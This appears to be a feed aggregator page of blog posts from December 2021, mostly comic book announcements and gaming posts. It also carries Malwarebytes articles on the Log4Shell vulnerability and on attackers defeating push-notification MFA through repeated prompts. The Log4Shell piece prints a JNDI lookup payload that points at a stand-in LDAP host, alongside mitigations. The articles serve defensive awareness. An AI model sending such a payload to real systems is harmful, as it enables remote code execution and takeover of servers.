Feed aggregator

Fang of the Serpent Men - I1 Dwellers of the Forbidden City by David Cook And Amazing Adventures Campaign Recap

Swords & Stitchery - Fri, 12/10/2021 - 20:28
 So over the last three months our Amazing Adventures campaign has been on hold for the last three months. We had a very elaborate game campaign going on with  the PC's jumping from one alternative Earth to another. Sort of a Pulp version of Sliders with various PC's coming into and outta of the campaign.  The various classic D&D modules such as I1 Dwellers of the Forbidden City by David Cook Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

[Updated] Log4j zero-day “Log4Shell” arrives just in time to ruin your weekend

Malwarebytes - Fri, 12/10/2021 - 18:03

If you’re running a service that relies on Apache Struts or uses the popular Apache Log4j utility we hope you haven’t made plans for the weekend.

An exploit listed as CVE-2021-44228 was made public on December 9, 2021. The exploit is simple, easy to trigger, and can be used to perform remote code execution (RCE) in vulnerable systems, which could allow an attacker to gain full control of them. All an attacker has to do is get the affected app to log a special string. For that reason, researchers have dubbed the vulnerability “Log4Shell”.

The vulnerability has a CVSS score of 10.0 out of a possible 10. It impacts Apache Log4j versions 2.0-beta9 to 2.14.1. Mitigations are available for version 2.10 and higher.

Log4j is an open source logging library written in Java that was developed by the Apache Software Foundation. Millions of applications use it, and some of them are enormously popular—such as iCloud, Steam, and Minecraft—so the potential reach of this problem is enormous.

How it works (simplified)

A logger is a piece of software that keeps a record of what’s happed on some part of a computer system. Logs can be used to determine if software is running smoothly, or to investigate events leading up to an error if something goes wrong. Generally speaking, IT and security folks want to log as much as they can.

As is the case for many loggers, Log4j also performs some basic operations to make the output easier to understand for us mere humans. One of these operations is variable substitution, which look for patterns like ${something}, and replaces them with other pieces of information.

This vulnerability lies in the replacement of the string ${jndi: This pattern triggers the Java Naming and Directory Interface, which can load Java resources from another computer, anywhere on the Internet.

Unfortunately, lots of applications log data that comes from their users without first sanitising it, and it’s possible for attackers to sneak variable substitution patterns into logs by including them in things like HTTP headers, or input fields.

The vulnerability is triggered with a simple string, sent to a vulnerable server:

${jndi:ldap://example.com/a}

When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process.

Having tricked the vulnerable application into loading their Java class, attackers can use it to execute commands with the same level of privilege as the application that uses the logging library.

Used in the wild

After the 0-day was posted on Twitter, along with a proof-of-concept that was published on GitHub, the exploit has already been spotted being used in the wild by CERT New Zealand, CERT Austria, and CERT Germany. Along with many others, they are seeing automated systems trying to exploit the vulnerability.

Given how common this library is and how serious the consequences of a relatively easy-to-exploit vulnerability can be, this is a recipe for disaster. Many organizations will not even realize they are vulnerable.

According to researcher Marcus Hutchins, in the case of Minecraft, attackers were able to get remote code execution on Minecraft servers by simply pasting the malicious string into the chat box. Similar examples exist for a number of other popular services.

Preventing Log4j exploits

Mitigations are available for versions of Log4j 2.10.0 and up. Version 2.15.0 is not vulnerable by default. Note that there may be other dependencies, such as your Java version, that need to be updated before you can upgrade. Fixing the vulnerability may not be straightforward, but it is urgent.

The Apache Log4j project advises that if you are unable to upgrade, for whatever reason, you can use the following mitigations:

  • In version 2.10.0 or higher by switching the log4j2.formatMsgNoLookups system property, or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. This can be done by adding ‐Dlog4j2.formatMsgNoLookups=True to the JVM command for starting the application.
  • For 2.7 up to and including 2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m.
  • For r2.0-beta9 up to and including 2.10.0, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Sadly, there is little, if anything, that users of affected systems can do to make themselves less vulnerable to the consequences. No doubt many systems will be affected and system administrators will want to treat anomalies with extreme caution.

So, if you’re an administrator looking forward to a quiet weekend, you know what to do!

Update: Dec 13, 5:00 am, PT—Widespread scanning and exploitation

After close examination of this vulnerability, researchers found that it had been actively exploited prior to the public disclosure, going back as far as December 1. The mass exploitation however, started after the disclosure.

The majority of attacks so far seem to be coming from established botnets like Mirai and others, including some cryptomining botnets. But Microsoft warned that is has seen the some attacks that resulted in a drop of Cobalt Strike. Cobalt Strike is a collection of threat emulation tools provided by HelpSystems to work in conjunction with the Metasploit Framework. But cybercriminals are often using it as a backdoor that provides an ideal foothold to start lateral movement in a network.

Update: Dec 13, 7:00 am, PT—Fears of a Log4j worm

As the security community wrestles with the vast scale of the Log4j problem, fears are growing that it may be “wormable” and that an Internet worm could appear in the next few days. (A worm is a piece of malware that infects vulnerable systems and then uses them to find and infect other systems.)

Because their rate of replication is exponential, worms can spread extremely quickly. In 2003, the SQL Slammer worm spread around the world in about ten minutes, and in 2017 the WannaCry ransomware worm spread around the world in a matter of hours, before its kill switch was activated.

Update: Dec 14, 4:15 am, PT—Version 2.16.0 of Log4j released

The tireless (and let’s not forget—unpaid, volunteer) maintainers of Log4j have released version 2.16.0, which includes two changes. JDNI is now disabled by default, and support for message lookups has been removed completely.

Although that seems a pretty definitive change, this remains a fast-moving situation. Both attackers and red teams are poring over the potential attack surface of Log4j and we recommend you stay up to date with the latest version, and be ready for further updates.

Update: Dec 15, 2:15 am, PT —New vulnerability in Log4j in certain non-default configurations

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack.

In a statement, Ralph Goers of the Apache Software Foundation (ASF) said that JNDI has significant security issues. It would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it.

Update: Dec 16, 4:00 am, PT– US officials have ordered federal agencies to protect their systems by Christmas Eve

The Cybersecurity and Infrastructure Security Agency (CISA) set a 24 December deadline for security patches. To help organizations, CISA has created a webpage, Apache Log4j Vulnerability Guidance and will actively maintain a community-sourced GitHub repository of publicly available information and vendor-supplied advisories regarding the Log4j vulnerability. CISA will continually update both the webpage and the GitHub repository.

The urgency was emphasized by Microsoft, which has warned some nation-state hacking groups are using Log4shell. They noticed the vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey.

Stay safe, everyone!

The post [Updated] Log4j zero-day “Log4Shell” arrives just in time to ruin your weekend appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Click “OK” to defeat MFA

Malwarebytes - Fri, 12/10/2021 - 16:08

Researchers have discovered that Nobelium—the threat actor behind the infamous SolarWinds supply-chain attack, the Sunburst backdoor, TEARDROP malware, GoldMax malware, and other malicious activities—has found a way to use stolen credentials even when they require multi-factor authentication that relies on smartphone push notifications.

And the technique used by this highly sophisticated threat actor? Nag users until they get bored.

Stealing credentials

In a report by Mandiant that describes several attack stages and scenarios by this group, one that jumped out at me involved the threat actor compromising service providers, and then using the privileged access and credentials belonging to these providers, to compromise downstream customers.

Attackers used the stolen credentials in a login page, which triggered a push notification to a device belonging to the credentials’ rightful owner. In theory the attacks should have been stopped there, because one of the two factors required for authentication—the push notification—needed the victim’s consent. In practice, that didn’t always work.

Nobelium used several tactics to get hold of valid credentials:

  • CRYPTBOT, an info-stealing malware.
  • Spear phishing campaigns.
  • Password guessing or password spraying.
  • Backdoors like FoggyWeb.

But often, having these credentials was not enough to gain access to the sensitive information the group was after. Most of the important services and assets required multi-factor authentication (MFA) authentication.

A brief introduction to MFA

Multi-factor authentication requires at least two different forms of authentication, from at least two out of three fairly broad categories:

  • The “something you know” category is the factor we are most familiar with. It requires a person to enter information that they know in order to gain access to their account. Passwords and PIN codes are the most common examples, but things like security questions used by your bank also fall into this category.
  • The “something you have” factor leans on something you have access to. That might be a separate email account or phone to which a verification code can be sent, but it can also be specialized hardware like a YubiKey.
  • The “something you are” category centers on certain physical markers (biometrics) that can be analyzed by technology to prove your identity. The most common examples are fingerprints and face recognition.

The most common forms of multi-factor authentiction rely on a password (something you know) and a PIN code or push notification sent to your phone (something you have).

Push notifications as a second factor

Many MFA providers use a second factor that sends a push notification or phone call to a user’s phone just after they’ve entered a password. Users are expected to press a key on a phone app to approve the login. (These fall into the “something you have” category, because you need physical access to the phone to approve the login.)

If a user receives a push notification out of the blue, at a time when they aren’t trying to log in, that means somebody else is trying to use their password. If that happens they obviously aren’t supposed to approve the login.

Mandiant’s research reveals that a threat actor found a way around this form of authentication by simply issuing repeated MFA requests until the user became so bored, confused or frustrated they accepted.

Perhaps this shouldn’t be a surprise. In circumstances where users are busy, pressed for time, or simply tired of dialog boxes or notifications, many have the gut reaction to do whatever it takes to stop the nuisance that is distracting them. If all they have to do is hit “OK” on a prompt (a prompt they have seen lots of times before when it was perfectly safe to hit “OK”), many may not even think twice. Or if they do, it will be too late.

Push vs SMS

Push notifications are often seen as an improvement over a more widely used but less secure form MFA that relies on SMS messages. Instead of hitting “OK” on a push notification, users enter a code—sent by SMS to their phone—alongside their username and password.

This attack shows that logic might not be right, at least not for everyone. Because push notifications are triggered automatically they could potentially be used in a “spray and pray” type of attack, where the threat actor tries to break into many different accounts at the same time, hoping that lots of people will absent-mindedly hit OK.

By contrast, attackers who want to compromise SMS-based MFA have to find a way to intercept the code being sent to the victim. Attacks often do this by persuading the victim’s cellphone carrier that they own the number and want to move it to a different phone, which puts the attacker in possession of the victim’s “someting you have”. Although this is highly effective, and serious enough that it’s causing people to move away from SMS-based MFA, it is very difficult to compromise lots of different phone numbers with this kind of “SIM swap” attack at the same time. So while it is very effective in targeted attacks, SIM swapping is completely unsuitable for large-scale attacks.

It’s also worth noting that the reflex to click “OK” to stop the annoying prompts does not work for SMS.

SMS authentication can potentially be exploited on a large scale by phishing though. If attackers can lure victims to a fake login page they can capture their usernames, passwords, and 2FA codes and then forward them to the real login page. Obviously, due to the normally very limited lifespan of the code, the attacker will have to be fast.

Mitigation

Both SMS and push notication-based MFA are improvements over no MFA at all, but both have their flaws. As an organization you should consider using a more restrictive type of MFA, at least for important assets.

Hardware keys are a much more robust second factor. They may be more expensive, but imagine the cost of a major breach they could save you from.  

Until you start using hardware keys, we hope that if you receive an unexpected prompt you will alert your security team, rather than try to get rid of it as fast as you can.

Stay safe, everyone!

The post Click “OK” to defeat MFA appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Luxe Loops Headband Tutorial

Moogly - Fri, 12/10/2021 - 16:01

The Luxe Loops Headband Tutorial will show you how to crochet this trendy stash buster – in both right and left-handed video tutorials! Follow along with the free written crochet pattern on Moogly! Disclaimer: This post includes affiliate links; materials provided by Yarnspirations. Luxe Loops Headband Tutorial: How to Crochet the Luxe Loops Headband –...

Read More

The post Luxe Loops Headband Tutorial appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

0
Categories: Crochet Life

BIG FINISH 2030AD: Doctor Who Audio Licence Extended!

Blogtor Who - Fri, 12/10/2021 - 15:00

Big Finish Productions’ licence to make Doctor Who audio drama now runs to 2030! Big Finish Productions, in association with BBC Studios, have announced that its licence to make original Doctor Who and spin-off audio adventures now runs until 31 March 2030. For more than two decades, Big Finish has been producing high quality, full-cast […]

The post BIG FINISH 2030AD: Doctor Who Audio Licence Extended! appeared first on Blogtor Who.

Categories: Doctor Who Feeds

The Call of the Wild

Sorcerer's Skull - Fri, 12/10/2021 - 12:00


The Beastlands is the plane of idealized nature. The prevailing theory is that it was formed by the will of the Titans, the proto-gods born of chaos, blamed for the creation of material world, as a conceptual model of the Material Plane, though this is perhaps an anthropomorphic misapprehension, attributing as it does rational, fathomable motives to alien their minds.

It's location (if a conceptual realm can truly be said to have location) between Arborea and Elysium has been ascribed to mere sympathetic aggregation (owing to all three evoking the natural world), though some have argued equally persuasively that it partakes of both the harmony of Elysium and the carnal nature of Arborea. 

The Beastlands is primeval wilderness, unspoiled by the action of thinking creatures. Its inhabitants are are animals--or rather the iconic spirits of all wildlife, fierce and beautiful. These animals may speak if they wish to do so, but it is wrong to imbue them with human characteristics beyond this or processes of thought. At all times they are wild beasts, and are not given to acting outside their natural roles.

Travelers who spend time in the Beastlands will feel the call of the beast within. Lycanthropes are empowered by the realm, and other humans may be susceptible to being transformed into animalistic forms the longer they stay. The partaking of certain foodstuffs within the Beastlands hastens this transformation, and varieties of Bestland fungi are sought for ritual use on the Material Plane for their potent connection to this realm.

COWBOY BEBOP #1 preview

First Comics News - Fri, 12/10/2021 - 06:31

COWBOY BEBOP #1

Writer: Dan Watters

Artist: Lamar Mathurin

Publisher: Titan Comics

SC, FC, 32pp, On Sale: January 19, 2022

BASED ON THE NETFLIX LIVE-ACTION ADAPTATION OF THE ORIGINAL ANIME!

An original story set in the year 2171. The bounty hunter crew of the spaceship Bebop chase an ex-gang member who holds a vest which gives the wearer unlimited luck.

New Netflix series starring John Cho (STAR TREK), Mustafa Shakir (LUKE CAGE) and Daniela Pinada (JURASSIC WORLD: FALLEN KINGDOM).

#1 COVERS:

Cover A: Stanley ‘Artgerm’ Lau

Cover B: Photo

Cover C: Claudia Ianniciello (part of connecting covers set across #1-4)

Cover D: Afu Chan

Cover E: Yishan Li

Cover F: Stanley ‘Artgerm’ Lau B&W Variant

Cover G: Color Blank Cover (part of a set across #1-4)

Cover FOC: Yoshi Yoshitani Virgin Variant

Cowboy Bebop #1 hits comic shops, in the UK/Europe from Forbidden Planet and digital devices on January 19, 2022 and is available to pre-order now.

Categories: Comic Book Blogs

Star Wars Insider: The Galaxy’s Greatest Heroes On sale 25 January, 2022!

First Comics News - Fri, 12/10/2021 - 06:26

The heroes of the Star Wars have inspired audiences for over 40 years as they have battled tyranny, injustice, and evil.

This lavishly illustrated volume includes classic interviews with the key players behind the characters, Mark Hamill (Luke Skywalker), Carrie Fisher (Leia Organa), Harrison Ford (Han Solo), Daisy Ridley (Rey), John Boyega (Finn), Ashley Eckstein (Ahsoka Tano), and Ewan McGregor (Obi-Wan Kenobi), along with the filmmakers who have brought creator George Lucas’ epic vision to life.

Star Wars Insider: The Galaxy’s Greatest Heroes is available to pre-order now from all good bookstores and comic shops, as well as via Forbidden Planet, Amazon and Barnes & Noble.

Please ensure that you include these links with your coverage:
Available from Amazon: https://amzn.to/3DsOLHJ

Categories: Comic Book Blogs

Lee Durfey-Lavoie and Veronica Agarwal’s JUST ROLL WITH IT

First Comics News - Fri, 12/10/2021 - 06:18

Is a Powerful and Playful Graphic Novel about Anxiety, OCD, RPGs, and Surviving School

Random House Graphic to Publish A Charming Graphic Novel For Everyone Who’s Ever Had A Complicated Relationship With Their Twenty-Sided Die

(December 9, 2021) Starting middle school is hard enough when you don’t know anyone; it’s even harder when you’re shy and anxious. Maggie just wants to get through her first year of middle school unscathed, but between finding the best after-school clubs, trying to make friends, and avoiding the rumored monster on school grounds, she’s having a tough time… And when she gets nervous, Maggie turns to her twenty-sided die. As long as Maggie rolls the right number, nothing can go wrong… or so she thinks. But what happens if Maggie rolls the wrong number?

JUST ROLL WITH IT is the debut graphic novel from writer Lee Durfey-Lavoie and the second graphic novel from artist Veronica Agarwal. Perfect for fans of Guts and Real Friends, JUST ROLL WITH IT is a touching story that explores the complexity of anxiety, OCD, and learning to trust yourself and the world around you.

“JUST ROLL WITH IT aims to open a dialogue about mental health for young readers and give them some terminology to help navigate talking about it,” said Veronica Agarwal. “I was inspired by Svetlana Chmakova’s ‘Berry Brook Middle School’ series (Awkward / Brave / Crush) that highlights issues kids deal with but doesn’t belittle them. I wanted this story to be something that shows how a lot of us live alongside our anxiety, and that the end goal of one’s mental health journey doesn’t have to be ‘fixing’ yourself, but rather becoming the best version of you, anxiety and all.”

“It was important for us to reflect the world we live in—from diversity of body size, race, sexuality, etc, to diversity of how we take in the world around us,” said Lee Durfey-Lavoie. “We wanted to make characters that were serious, goofy, afraid, silly, and who reflected all the wacky and wonderful aspects of being in middle school. We wanted the book to reflect our own experience: that mental illness can be scary and difficult, but it isn’t insurmountable, and the ones you love can help you through it.”

Categories: Comic Book Blogs

Final Destination of the Warden - The World of Greyhawk As Old School Campaign

Swords & Stitchery - Fri, 12/10/2021 - 02:32
 S3 'Expediation to The Barrier Peaks' by Gary Gygax is one of the most lethal adventures I've run in the past. This module presents a very interesting idea not only are the surroundings of the campaign world being infected with invasive species but Greyhawk has it's monster population boosted. But could player's PC's make it aboard the starship Warden from the Warden Science vessel?! Bare in Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

UNLOCK THE SECRETS OF THE HALO UNIVERSE WITH THE HALO ENCYCLOPEDIA DELUXE EDITION

First Comics News - Fri, 12/10/2021 - 00:10

Includes a Decorative Slipcase, Exclusive Cover, and a Gallery-Quality Lithograph

MILWAUKIE, Ore., (December 9, 2021)—Dark Horse Books and 343 Industries present The Halo Encyclopedia Deluxe Edition, the gorgeous companion book for every Halo fan.      

 

The universe of Halo is remarkably vast in scale and astonishingly elaborate in detail, telling rich stories filled with bold characters, breathtaking worlds, and thrilling conflicts. In celebration of the 20th anniversary of Halo, Dark Horse and 343 Industries have teamed up to deliver the most definitive guide to the universe thus far.

 

The Halo Encyclopedia­ Deluxe Edition answers some of the Halo universe’s greatest mysteries, making it only natural that it be encased within a Forerunner cylix—an enigmatic device built to hold many of their civilization’s safeguarded secrets! The Deluxe Edition also comes with an exclusive cover and lithograph.

 

Halo Encyclopedia Deluxe Edition hardcover will be available March 30, 2022. It is available for pre-order on Amazon, Barnes & Noble, and at your local comic shop and bookstore. It will retail for $99.99.

 

The Halo Encyclopedia standard edition hardcover is also available for pre-order at Amazon, Barnes and Noble, and at your local comic shop and bookstore and will retail for $49.99.

Categories: Comic Book Blogs

Bah Humbug! It’s A Christmas Carol, FIREFLY Style!

First Comics News - Fri, 12/10/2021 - 00:08

Discover the Secret Hidden Past, Present, and Future in
FIREFLY HOLIDAY SPECIAL #1 in December 2021

LOS ANGELES, CA (December 9, 2021) – BOOM! Studios revealed today a first look at THE FIREFLY HOLIDAY SPECIAL #1, an oversized special one-shot out December 2021. Celebrate the holiday season with your favorite Browncoats in this self-contained special by Emmy and Eisner Award-winning writer Jeff Jensen (HBO’s Watchmen, Better Angels: A Kate Warne Adventure), artists Vincenzo Federici (Go-Go Power Rangers), Jordi Pérez (Firefly), Fabiana Mascolo (Firefly: Brand New ‘Verse), colorists Francesco Segala with color assistance by Gloria Martinelli, Lucia Di Giammarino, and letterer Jim Campbell.

It’s the holiday season and Jayne’s selfish behavior receives the unwanted attention of three visiting spirits who reveal the hidden past, present and future of Serenity’s most…miserly crew member. A beloved character returns as the Ghost of Firefly Past, while a fellow crew member guides Jayne through the here and now, showing the consequences of his actions in the present. But it’s the Ghost of Firefly Future, Emma Washburne, who reveals the most shocking fate of all. Can Jayne turn over a new leaf and avert the disaster headed his way?

Set 500 years in the future in the wake of a universal civil war, Firefly centers on the crew of Serenity, a small transport spaceship that doesn’t have a planet to call home. Captain Malcolm “Mal” Reynolds, a defeated soldier who opposed the unification of the planets by the totalitarian Alliance, will undertake any job — legal or not — to stay afloat and keep his crew fed. Thrust together by necessity but staying together out of loyalty, these disparate men and women are seeking adventure and the good life, but face constant challenges on the new frontier, such as avoiding capture by the Alliance, and evading the dangers you find on the fringes of the ‘verse.

THE FIREFLY HOLIDAY SPECIAL #1 features main cover art by acclaimed illustrator InHyuk Lee (Seven Secrets) and variant cover art by fan favorite artists Caitlin Yarsky (Coyotes) and Daniel Warren Johnson (Murder Falcon) with by Mike Spice.

FIREFLY HOLIDAY SPECIAL is the newest release from BOOM! Studios’ eponymous imprint, home to critically acclaimed original series, including BRZRKR by Keanu Reeves, Matt Kindt, and Ron Garney; We Only Find Them When They’re Dead by Al Ewing and Simone Di Meo; Proctor Valley Road by Grant Morrison, Alex Child, and Naomi Franq; We Only Find Them When They’re Dead by Al Ewing and Simone Di Meo; Seven Secrets by Tom Taylor and Daniele Di Nicuolo; Something is Killing the Children by James Tynion IV and Werther Dell’Edera; Once & Future by Kieron Gillen and Dan Mora; Abbott by Saladin Ahmed and Sami Kivelä; and Eve by Victor LaValle and Jo Mi-Gyeong. The imprint also publishes popular licensed properties, including Dune: House Atreides from Brian Herbert, Kevin J. Anderson, and Dev Pramanik; Mighty Morphin and Power Rangers from Ryan Parrott, Marco Renna, and Francesco Mortarino; and Magic from Jed McKay and Ig Guara.

Print copies of FIREFLY HOLIDAY SPECIAL #1 will be available for sale on December 15, 2021 exclusively at local comic book shops (use comicshoplocator.com to find the nearest one) or at the BOOM! Studios webstore. Digital copies can be purchased from content providers, including comiXology, iBooks, Google Play, and Kindle.

For continuing news on FIREFLY and more from BOOM! Studios, stay tuned to boom-studios.com and follow @boomstudios on Twitter.

Jeff Jensen

Categories: Comic Book Blogs

‘GRENDEL’ TO BE COLLECTED IN A LINE OF SECOND EDITION OMNIBUSES FROM DARK HORSE COMICS

First Comics News - Fri, 12/10/2021 - 00:06

In Commemoration of the 40th Anniversary, the Original Grendel Stories to be Reprinted Ahead of the Upcoming Netflix Show!

MILWAUKIE, Ore., (December 9, 2021)—In celebration of the 40th anniversary for Matt Wagner’s expansive, genre defying saga Grendel, Dark Horse Comics will be publishing a second edition of the complete Grendel Omnibus line. Starting with the first man to wear the Grendel moniker, Hunter Rose (the character and story behind the upcoming Netflix show!) and traveling into the far-flung future with Grendel Prime, the Grendel Omnibuses are a must have for long time fans and new readers alike!

 

Grendel Omnibus Volume 1 begins the entire epic series and chronicles the complete Hunter Rose storyline. This collection features millionaire Hunter Rose and his alter ego, the criminal mastermind Grendel! This collection features the very first Hunter Rose story, a complete Hunter Rose adventure by Matt Wagner, and vignettes and short stories from that key Grendel era by contributing storytellers Tim Sale, Guy Davis, Stan Sakai, Mike Allred, Darrick Robertson, Michael Avon Oeming, Jill Thompson, the Pander Brothers, Duncan Fegredo, Troy Nixey, and many more!

 

This first omnibus reprints Grendel: Devil by the Deed; the short story collections Grendel: Black, White, & Red and Grendel: Red, White, & Black, and Grendel: Behold the Devil. It also features a brand-new cover illustrated by Matt Wagner and colored Brennan Wagner.

 

“When I first created Grendel, I could only dream that the character and concepts would have a life and resonance beyond the initial storyline.  Now, forty years into this dark and sprawling saga, I can look back on an epic narrative that’s always provided as many thrills and surprises for me as it hopefully has for its readers.”

—Matt Wagner

 

Grendel Omnibus Volume 1: Hunter Rose TPB will be in comic shops June 8, 2022 and bookstores June 21, 2022. It is available for pre-order on Amazon, Barnes & Noble, and at your local comic shop and bookstoreGrendel Omnibus Volume 1: Hunter Rose will retail for $29.99.

Categories: Comic Book Blogs

1d10 Random Telepathic Encounter Table For Any Science Fantasy Game

Swords & Stitchery - Thu, 12/09/2021 - 23:41
 Your mind stretches outwards probing into the infinite realms of thought & space beyond the borders of human ken & encounters.. what?  Well  worry no more with this handy random telepathic encounters table. 1d10 Random Telepathic Encounter TableAn ancient mind from a forgotten solar system searching the cosmos for any suitable worlds near by. This mind is full of curious thoughts about the Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Prepare for more fantasy-skewering ultra-violent hilarity, muffin huggers, at Young’s Stupid Fresh Mess Substack on 12/9

First Comics News - Thu, 12/09/2021 - 19:24

The Unbelievable, Unfortunately Mostly Unreadable and Nearly Unpublishable Untold Tales of I Hate Fairyland by Fábio Moon & Gabriel Bá

Kansas City, MO—Following his 20-issue run on I HATE FAIRYLAND at Image Comics, acclaimed Eisner-winning cartoonist Skottie Young is opening the borders of his whimsical fantasy universe for new writers and artists to wreak havoc. Fábio Moon and Gabriel Bá, the acclaimed fraternal artists behind The Umbrella Academy and the creative team of Daytripper and Two Brothers, join a line of creators with their new contribution, “I Hate Gert!”—a six-page descent into madness exploring some of the mythos’ most quirky foes.

This chapter headlines just one of many guest-created comics in a new monthly series called The Unbelievable, Unfortunately Mostly Unreadable and Nearly Unpublishable Untold Tales of I Hate Fairyland—debuting exclusively for free on Young’s Substack Newsletter, Stupid Fresh Mess. These mini-comics pave the road to Young’s relaunch of I HATE FAIRYLAND at Image Comics, debuting with a new first issue in July written by Young with art from Brett Parson.

These stories further explore the comically inept, bloody journey of Gert—a young girl sucked into a world of eccentric fairy tale conventions building on the legacies of L. Frank Baum, C.S. Lewis, Lewis Carroll, and beyond. Upon failing to reach home over more than two decades, Gert (stuck in her 6-year-old body) wages a one-“child” war on her new home with a very, very large axe, aided by her exhausted bug guide, Larry.

“After a few years away from Gert and the gang, I was starting to miss the energy of I HATE FAIRYLAND and the stories I could tell only in that universe,” Young explains. “I thought it was time to bring it back, but not only continue Gert’s ongoing saga, but also introduce short stories that fill in the many gaps in all the years she’s been in Fairyland. So I decided to reach out to some of my awesome cartoonist pals and invite them to join in on the fun.”

“Reading I HATE FAIRYLAND, I felt like the kid who grew up reading Sergio Aragonés’ Groo and MAD Magazine‘s ‘Spy vs. Spy’ all over again,” Moon explains. “Gert is just the perfect character to surprise the reader with absurd stories, and the ever-growing cast of supporting characters inspired us to imagine a story in this universe.”

“There was something about the ‘everything goes’ fantasy setting of the story that we felt we could explore creatively in our work in ways that we usually can’t,” Bá continues. “We could swap roles and combine roles while doing this—ink each other’s pencils, or color each other’s pages, have fun while doing it, and create a story that’s the fusion of both our visual styles and different from everything we’ve done before.”

“Fabio and Gabriel are two of my favorite people on the planet, outside of their insane amount of talent. Now, not only do I get to call them friends, but collaborators. It really is surreal to think these two geniuses jumped into my I HATE FAIRYLANDsandbox and started causing havoc. I’m the luckiest cartoonist in the world,” Young says.

The Unbelievable, Unfortunately Mostly Unreadable and Nearly Unpublishable Untold Tales of I Hate Fairyland, “I Hate Gert” will be available on the Stupid Fresh Mess Substack Newsletter on 12/9. The monthly subscription tier includes such rewards as digital art books, live stream access, art process videos, creator commentary,  and access to giveaways and contests. The annual subscription tier include all monthly perks plus a physical copy of The Untold Tales of I Hate Fairyland, releasing in 2022.

Click here for preview art for The Unbelievable, Unfortunately Mostly Unreadable and Nearly Unpublishable Untold Tales of I Hate Fairyland, “I Hate Gert” by Fábio Moon & Gabriel Bá

The Unbelievable, Unfortunately Mostly Unreadable and Nearly Unpublishable Untold Tales of I Hate Fairyland, “I Hate Gert”
Writers/Artists: Fábio Moon and Gabriel Bá
Letterer: Nate Piekos
Editor: Joel Enos

The Unbelievable, Unfortunately Mostly Unreadable and Nearly Unpublishable Untold Tales of I Hate Fairyland by Fábio Moon & Gabriel Bá

Categories: Comic Book Blogs

THE WRONG EARTH World-Shattering Special Event

First Comics News - Thu, 12/09/2021 - 19:19

Gail Simone, Mark Waid, Mark Russell, and Stuart Moore Join Tom Peyer to Write THE WRONG EARTH World-Shattering Special Event Comics for AHOY Comics

 

Featuring Always Amazing Art by Bill Morrison, Walter Geovani, Michael Montenat, Fred Harper, Leonard Kirk, and Greg Scott

 

With Covers by THE WRONG EARTH Co-Creator Jamal Igle

and Variants Covers by Gene Ha, Dan Parent, Jerry Ordway, and More

 

(December 9, 2021) Bestselling writers Gail Simone (Red Sonja) and Mark Waid (History of the Marvel Universe) are joining AHOY Comics Editor-in-Chief Tom Peyer, Second Coming writer Mark Russell, and Captain Ginger writer Stuart Moore to write world-shattering, money-grabbing, stand-alone THE WRONG EARTH specials for AHOY Comics. These comics will feature art by Bill Morrison, Walter Geovani, Michael Montenat, Fred Harper, Leonard Kirk, and Greg Scott, with covers by THE WRONG EARTH co-creator and artist Jamal Igle. Each special will have a variant cover by Gene Ha; there will also be  variant covers by Dan Parent, Jerry Ordway, and other artists. The multiverse-spanning monthly event will begin in March with the release of THE WRONG EARTH: TRAPPED ON TEEN PLANET #1, written by Gail Simone, with art by Bill Morrison, Walter Geovani, and Rob Lean, with colors by Andy Troy, and lettering by Rob Steen.

 

“Words will be written, words will be deleted, and nothing will ever be the same,” said AHOY Comics Editor-in-Chief and THE WRONG EARTH co-creator Tom Peyer. “This is Crisis on Infinite Earths, minus the line-wide consequences that made it interesting. This is Secret Wars without toys. This is the kind of epic, superheroic storytelling that publishers and CFOs love, where the tail of wealth-enhancing variant covers wags the dog of art.”

 

Each of THE WRONG EARTH world-shattering special event one-shots will present a stand-alone, 25-page story that expands on the multiverse first introduced in AHOY Comics’ flagship title by Peyer and Igle, wherein the campy Dragonflyman of Earth Alpha switched places with the gritty Dragonfly of Earth Omega and chaos ensued.

 

The first issue to hit stores, THE WRONG EARTH: TRAPPED ON TEEN PLANET #1, finds grim-and-gritty vigilante Dragonfly whisked to an Earth of teenagers, malt shops, love triangles, and nonstop jokes. Will they win him over—or will his violent methods infect their world? The issue is illustrated by Bill Morrison (The Simpsons), Walter Geovani (Red Sonja/ Tarzan), and Rob Lean (Smallville: Alien), with colors by Andy Troy, and lettering by Rob Steen. THE WRONG EARTH: TRAPPED ON TEEN PLANET #1 will feature variant covers by both Gene Ha (Wonder Woman Historia: The Amazons) and Dan Parent (Veronica). The issue marks the AHOY Comics debut of legendary writer Gail Simone.

 

“Tom Peyer and Jamal Igle created a clever premise with THE WRONG EARTH that is a deeply satisfying read. All it needed were more redheads,” said Simone. “Our story is about a town, a small town, and the people who live in the town, including an earnest ginger, who is sort of in love with two girls. From a distance, this town presents itself like so many other small towns all over the world: safe, decent, innocent. Get closer, though, and you start seeing the shadows, specifically the long, dark shadow of the Dragonfly.”

 

THE WRONG EARTH world-shattering special event continues in subsequent months with:

 

  • THE WRONG EARTH: FAME & FORTUNE #1 from writer Mark Russell, artist Michael Montenat, colorist Andy Troy, and letterer Rob Steen. On sale in April, this comic from the writer of Billionaire Island provides a satirical look at two different versions of Richard Fame and how, despite the best and worst intentions, huge gobs of money determine their own results.

 

